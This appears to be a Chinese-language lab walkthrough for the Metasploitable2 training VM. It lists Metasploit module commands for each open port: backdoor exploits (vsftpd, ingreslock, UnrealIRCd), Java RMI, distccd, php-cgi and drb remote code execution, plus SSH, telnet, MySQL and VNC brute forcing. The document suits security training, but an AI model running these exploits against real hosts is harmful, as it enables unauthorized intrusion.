Metasploitable2靶機介紹:
Metasploitable2 虛擬系統是一個特別製作的ubuntu作業系統,本身設計作為安全工具測試和演示常見漏洞攻擊。這個版本的虛擬系統相容VMware。當虛擬系統啟動之後,使用使用者名稱:msfadmin 和密碼msfadmin登陸 適用於學習網路安全新手學習
Metasploitable2靶機下載:
https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q
提取碼:810r
Metasploitable2靶機安裝:
下載好了把安裝包解壓 然後試用VMware即可。
Metasploitable2靶機漏洞詳解:
滲透機:kali IP :192.168.28.128
靶機IP :192.168.28.141
漏洞清單:
21埠
search vsftpd
use 0
set rhosts 192.168.28.141
run
22埠==直接暴力破解
Search ssh_login 搜尋模組
Use auxiliary/scanner/ssh/ssh_login 使用模組
Set RHOST 192.168.28.141 設定目標地址
Set USER_FILE XXX 設定使用者字典路徑
Set PASS_FILE XXX 設定字典密碼路徑
Set THREADS 100 設定執行緒是100
Run
23埠(telnet):
search telnet_login
use 1
Set RHOST 192.168.28.141 設定目標地址
Set USER_FILE XXX 設定使用者字典路徑
Set PASS_FILE XXX 設定字典密碼路徑
Set THREADS 100 設定執行緒是100
Run
80埠
拿到站點進行滲透老套路====資訊蒐集啥的
search php-cgi
use 0
set rhost 192.168.28.141
run
background====將shell後置後臺
139埠,445埠
這兩個都是smb型別的,是共享服務,首選我們需要知道它的共享目錄有哪些,列舉之後可看到一共發現有5個如下
search smb_eumn
0 auxiliary/scanner/smb/smb_enumshares
use 0
set rhost 192.168.28.141
在使用一個指令碼:use auxiliary/admin/smb/samba_symlink_traversal
1099埠
一個Java反序列化命令執行漏洞,可以看到已經getshell
原理:Java RMI Server 的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致
search java rmi
4 exploit/multi/misc/java_rmi_server
use 4
set rhosts 192.168.28.141
run
1524埠ingreslock
在少數伺服器上存在一個古老的令人驚訝的“ingreslock”後門,監聽1524埠。在過去的十年裡,它經常被用於入侵一個暴露的伺服器。它的利用是如此簡單。
telnet 192.168.28.141 1524
3306資料庫預設埠
既然執行遠端連線,直接爆破,賬號root密碼為空然後登入
使用模組:use auxiliary/scanner/mysql/mysql_login
search mysql_login
use 0
set username root
3632 distccd服務
遠端命令執行漏洞,直接exp
使用模組:use exploit/unix/misc/distcc_exec
search distccd
use 0
set rhost 192.168.28.141
後面幾個利用教程就不詳細展開了!!!
5432埠
postgresq爆破
5900埠vnc服務
vnc服務有兩部分構成,一部分是服務,一個是客戶端,我們進行爆破
使用模組爆破:use auxiliary/scanner/vnc/vnc_login
6667埠
6697 IRC服務, IRC服務這個版本存在後門漏洞,直接exp後getshell
使用模組:use exploit/unix/irc/unreal_ircd_3281_backdoor
8180埠
暴力破解賬號密碼:tomcat;tomcat
8787埠drb服務
有個遠端程式碼執行漏洞
使用模組:use exploit/linux/misc/drb_remote_codeexec